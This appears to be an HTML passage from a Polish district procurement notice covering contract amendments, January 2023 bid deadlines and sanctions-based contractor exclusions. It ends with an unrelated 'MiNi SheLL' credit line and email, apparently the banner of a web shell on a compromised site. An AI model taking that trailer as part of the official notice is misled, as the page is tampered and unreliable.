zamieszki, pożary, strajki, spory zbiorowe, konflikty zbrojne, stan wojenny, klęski żywiołowe, niekorzystne warunki atmosferyczne, awarie maszyn, działania w wykonaniu władzy publicznej oraz inne okoliczności niezawinione przez żadną ze Stron, Zamawiający dopuszcza zmiany sposobu realizacji Umowy lub zmiany zakresu świadczeń Wykonawcy wymuszone takimi zmianami,<br/>2)	w przypadku konieczności dokonania zmiany modelu lub modelu i producenta sprzętu/oprogramowania (np. w przypadku brak dostępności na rynku, pojawienia się na rynku urządzenia producenta sprzętu nowszej generacji lub nowej wersji oprogramowania, o lepszych parametrach i pozwalających na zaoszczędzenie kosztów eksploatacji pod warunkiem, ujawnienia się powszechnie występujących wad oferowanego urządzenia) niepowodującej zwiększenia ceny, Strony dopuszczają możliwość zmiany pod warunkiem, że Wykonawca zaoferuje sprzęt/oprogramowanie <br/>o parametrach nie gorszych niż zaoferowane w pierwotnej ofercie, określonej <br/>w załączniku nr 1 do Umowy (Opis przedmiotu zamówienia – parametry oferowanego sprzętu),<br/>3)	w przypadkach, w których zgodnie z powyższymi postanowieniami lub przepisami prawa możliwe jest wprowadzenie zmiany do Umowy, Zamawiający przewiduje także wprowadzenie odpowiedniej zmiany terminu realizacji, w szczególności: <br/>a)	o ile zmiana taka jest konieczna w celu prawidłowego wykonania Umowy, <br/>w szczególności ze względu na zaistnienie okoliczności, o których mowa w pkt 1) i 2) powyżej; <br/>b)	ze względu na okoliczności niezależne od Wykonawcy, np. opóźnienie <br/>w dostawie z zagranicy, kontrola celna, opóźnienie lub zatrzymanie transportu wynikające np. z powodu warunków atmosferycznych, <br/>- termin określony w Umowie na realizację dostawy może zostać odpowiednio. wydłużony, o czas równy czasowi wystąpienia przedmiotowych okoliczności,<br/>4)	w przypadku zmiany opodatkowania lub obowiązujących stawek podatku VAT, należność za dostarczany towar zostanie wyliczona przy uwzględnieniu zmienionych zasad lub stawek podatku VAT,<br/>5)	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej Umowy i mających charakter zmian nieistotnych, tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy zakupowej Zamawiającego pod adresem: https://powiat-gniezno.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5. Zamawiający wykluczy z postępowania również:<br/>1) Wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r.<br/>dotyczącym środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainydalej „rozporządzenie 765/2006”) lub rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków<br/>ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub<br/>im zagrażających (dalej „rozporządzenie 269/2014”) albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 15 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz. U. poz. 835);<br/>2) Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 15 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz.<br/>835);<br/>3) Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r.,<br/>o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 15 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com